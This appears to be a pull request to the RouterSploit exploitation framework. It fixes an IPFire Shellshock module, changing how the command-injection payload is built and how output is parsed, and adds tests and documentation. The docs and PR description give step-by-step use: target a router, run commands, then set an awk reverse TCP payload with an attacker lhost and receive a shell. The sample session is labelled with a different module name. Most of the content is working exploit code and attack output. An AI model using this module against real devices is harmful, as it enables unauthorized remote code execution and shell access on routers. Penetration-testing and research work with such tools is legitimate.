### PR TITLE
Fixing IPFire Shellshock module, adding tests and docs

### DIFF
--- a/docs/modules/exploits/routers/ipfire/ipfire_shellshock.md
+++ b/docs/modules/exploits/routers/ipfire/ipfire_shellshock.md
@@ -1,0 +1,87 @@
+## Description
+Exploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. If the target is vulnerable 
+it is possible to execute commands on operating system level.
+
+## Verification Steps
+
+    1. Start `./rsf.py`
+    2. Do: `use exploits/routers/ipfire/ipfire_shellshock`
+    3. Do: `set target [TargetIP]`
+    4. Do: `run`
+    5. If router is vulnerable, it should be possible to execute commands on operating system level.
+
+    6. Do: `set payload awk_reverse_tcp`
+    7. Do: `set lhost [AttackerIP]`
+    8. Do: `run`
+    9. Payload is sent to device and executed providing attacker with the command shell.
+
+## Scenarios
+
+```
+rsf > use exploits/routers/ipfire/ipfire_proxy_rce
+rsf (IPFire Proxy RCE) > set target 192.168.2.88
+[+] target => 192.168.2.88
+rsf (IPFire Proxy RCE) > show options
+
+Target options:
+
+   Name       Current settings     Description
+   ----       ----------------     -----------
+   ssl        true                 SSL enabled: true/false
+   target     192.168.2.88         Target IPv4 or IPv6 address
+   port       444                  Target HTTP port
+
+
+Module options:
+
+   Name          Current settings     Description
+   ----          ----------------     -----------
+   verbosity     true                 Verbosity enabled: true/false
+   username      admin                Username to log in with
+   password      admin                Password to log in with
+
+
+rsf (IPFire Proxy RCE) > run
+[*] Running module...
+[+] Target is vulnerable
+[*] Invoking command loop...
+
+[+] Welcome to cmd. Commands are sent to the target via the execute method.
+[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.
+
+cmd > uname -a
+[*] Executing 'uname -a' on the device...
+Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux
+
+cmd > show payloads
+[*] Available payloads:
+
+   Payload             Name                Description
+   -------             ----                -----------
+   awk_bind_udp        Awk Bind UDP        Creates an interactive udp bind shell by using (g)awk.
+   awk_bind_tcp        Awk Bind TCP        Creates an interactive tcp bind shell by using (g)awk.
+   awk_reverse_tcp     Awk Reverse TCP     Creates an interactive tcp reverse shell by using (g)awk.
+
+cmd > set payload awk_reverse_tcp
+cmd (Awk Reverse TCP) > show options
+
+Payload Options:
+
+   Name        Current settings     Description
+   ----        ----------------     -----------
+   lhost                            Connect-back IP address
+   lport       5555                 Connect-back TCP Port
+   encoder                          Encoder
+   cmd         awk                  Awk binary
+
+
+cmd (Awk Reverse TCP) > set lhost 192.168.2.100
+lhost => 192.168.2.100
+cmd (Awk Reverse TCP) > run
+[*] Executing payload on the device
+[*] Waiting for reverse shell...
+[*] Connection from 192.168.2.88:48775
+[+] Enjoy your shell
+id
+uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
+```

--- a/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py
+++ b/routersploit/modules/exploits/routers/ipfire/ipfire_shellshock.py
@@ -5,7 +5,7 @@ from routersploit.core.http.http_client import HTTPClient
 class Exploit(HTTPClient):
     __info__ = {
         "name": "IPFire Shellshock",
-        "description": "Exploits shellshock vulnerability in IPFire M= 2.15 Core Update 82. "
+        "description": "Exploits shellshock vulnerability in IPFire <= 2.15 Core Update 82. "
                        "If the target is vulnerable it is possible to execute commands on operating system level.",
         "authors": (
             "Claudio Viviani",  # vulnerability discovery
@@ -21,6 +21,7 @@ class Exploit(HTTPClient):
 
     target = OptIP("", "Target IPv4 or IPv6 address")
     port = OptPort(444, "Target HTTP port")
+    ssl = OptBool(True, "SSL enabled: true/false")
 
     username = OptString("admin", "Username to log in with")
     password = OptString("admin", "Password to log in with")
@@ -38,11 +39,11 @@ class Exploit(HTTPClient):
 
     def execute(self, cmd):
         marker = utils.random_text(32)
-        cmd = "echo {};{};echo{}".format(marker, cmd, marker)
+        cmd = "echo {};{}".format(marker, cmd)
         payload = self.payload.replace("{{cmd}}", cmd)
 
         headers = {
-            'VULN': payload,
+            "VULN": payload,
         }
 
         response = self.http_request(
@@ -56,7 +57,7 @@ class Exploit(HTTPClient):
 
         if response.status_code == 200:
             start = response.text.find(marker) + len(marker) + 1  # marker and whitespace
-            end = response.text.find(marker, start) - 48
+            end = response.text.find("<!DOCTYPE html>", start)
 
             return response.text[start:end]
 
@@ -69,7 +70,7 @@ class Exploit(HTTPClient):
         payload = self.payload.replace("{{cmd}}", cmd)
 
         headers = {
-            'VULN': payload,
+            "VULN": payload,
         }
 
         response = self.http_request(
@@ -78,10 +79,8 @@ class Exploit(HTTPClient):
             headers=headers,
             auth=(self.username, self.password)
         )
-        if response is None:
-            return False  # target is not vulnerable
 
-        if response.status_code == 200 and marker in response.text:
+        if response and marker in response.text:
             return True  # target is vulnerable
 
         return False  # target is not vulnerable

--- a/tests/exploits/routers/ipfire/test_ipfire_shellshock.py
+++ b/tests/exploits/routers/ipfire/test_ipfire_shellshock.py
@@ -19,9 +19,13 @@ def test_check_success(mocked_shell, target):
 
     assert exploit.target == ""
     assert exploit.port == 444
+    assert exploit.ssl is True
+    assert exploit.username == "admin"
+    assert exploit.password == "admin"
 
     exploit.target = target.host
     exploit.port = target.port
+    exploit.ssl = "false"
 
     assert exploit.check()
     assert exploit.run() is None


### PR DESCRIPTION
## Status
**READY**

## Description
This PR fixes IPFire Shellshock module, adds tests and docs

## Verification
    1. Start `./rsf.py`
    2. Do: `use exploits/routers/ipfire/ipfire_shellshock`
    3. Do: `set target [TargetIP]`
    4. Do: `run`
    5. If router is vulnerable, it should be possible to execute commands on operating system level.

    6. Do: `set payload awk_reverse_tcp`
    7. Do: `set lhost [AttackerIP]`
    8. Do: `run`
    9. Payload is sent to device and executed providing attacker with the command shell.

## Checklist
- [x] Fix module
- [x] Write tests
- [x] Document how it works
